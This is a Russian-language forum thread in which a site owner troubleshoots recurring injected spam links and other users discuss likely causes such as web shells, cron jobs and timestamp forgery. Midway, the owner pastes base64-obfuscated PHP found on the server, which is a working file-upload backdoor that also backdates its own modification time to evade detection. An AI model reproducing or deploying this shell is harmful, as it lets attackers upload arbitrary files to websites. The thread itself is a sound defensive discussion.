Общая тема о борьбе с шеллами и вирусами на сайте

исключено, все делал сам, кстати заметил когда появляются левые ссылки дата изменения документа не меняется... т.е ссылка появилась 20.04.2014 а дата последнего изменения документа к примеру 08.08.2013....

Значит есть доступ к ФТП, или шелл на серваке.

Время изменения документа легко выставляется манипуляцией системного времени на компе/серваке злоумышленника.

фтп вообще закрыто в панели управления.... шел имеете ввиду не на сайте а на сервере? хостер таймвеб утверждает что у них все ок!!! убегать от хостера?

Это повлияет только на mtime, а ведь есть еще и дата последнего изменения inode - ctime.

loed, в winscp можно глянуть ctime используя команду:

ls -lc

Консоль вызвается кнопкой в верхней панели либо комбинацией ctl+t

Насчет того, что каждый день на одних и тех же страницах появляются левые ссылки.

Может в cron задачи закинули скрипт.

Да хостер та тут причем? у тебя дырявый скрипт есть на серваке, тем-более раз сам делал и такие вопросы задаешь, то дырка там размером со слона!

Зы

скрипт не записывает в документ ссылку, а выводит ее.

ты хоть код залей куданить или ссылку дай на свай сдл.

НЕ ОНО ЛИ?

<? $GLOBALS['_935675742_']=Array(base64_decode('aXNfdXBsb2FkZW' .'RfZm' .'lsZQ=='),base64_decode('bW92ZV91cGxv' .'Y' .'W' .'RlZ' .'F9ma' .'Wxl'),base64_decode('dG' .'ltZQ' .'=='),base64_decode('' .'dG91Y2g=')); ?><? function _1402832279($i){$a=Array('PGgxPkxPQUQ8L2gxPgo=','WW91ciBJUDog','UkVNT1RFX0FERFI=','PGZvcm0gbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4K','PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGVuYW1lIj48YnI+IAo=','PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkxPQUQiPjxicj4K','PC9mb3JtPgo=','ZmlsZW5hbWU=','dG1wX25hbWU=','ZmlsZW5hbWU=','dG1wX25hbWU=','ZmlsZW5hbWU=','bmFtZQ==','ZmlsZW5hbWU=','bmFtZQ==','Tk8gRklMRQ==');return base64_decode($a[$i]);} ?><?php print _1402832279(0);echo _1402832279(1);echo $_SERVER[_1402832279(2)];echo _1402832279(3);echo _1402832279(4);echo _1402832279(5);echo _1402832279(6);if($GLOBALS['_935675742_'][0]($_FILES[_1402832279(7)][_1402832279(8)])){$GLOBALS['_935675742_'][1]($_FILES[_1402832279(9)][_1402832279(10)],$_FILES[_1402832279(11)][_1402832279(12)]);$_0=$_FILES[_1402832279(13)][_1402832279(14)];echo"<a href=\"$_0\">$_0</a>";}else{echo(_1402832279(15));}$_1=$_SERVER[SCRIPT_FILENAME];$_2=$GLOBALS['_935675742_'][2]()-round(0+20020720+20020720+20020720+20020720+20020720);$GLOBALS['_935675742_'][3]($_1,$_2); ?>

</body>

</html>

дак он поди, только используй тег code в следующий раз.

"рандомный" набор символов это php код закодированный в base64.

Тебе нужно их декодировать и перевести код в удобочитаемый вид.

Зы также прочитай хотя-бы за $GLOBALS,$_SERVER,$_FILES

это все лежало в файле отдельном не моем, снес его...

loed, каждый сам выбирает как ему жить. Если тебе в первую очередь важен конечный результат, а на понимание сути происходящего плевать, иди этим путем.

Только скрипт этот опять у тебя появиться на серваке, а антивирусы дальше будут рапортовать - все хорошо, прекрасная маркиза, всё хорошо, всё хо-ро-шо!!!

не помогает....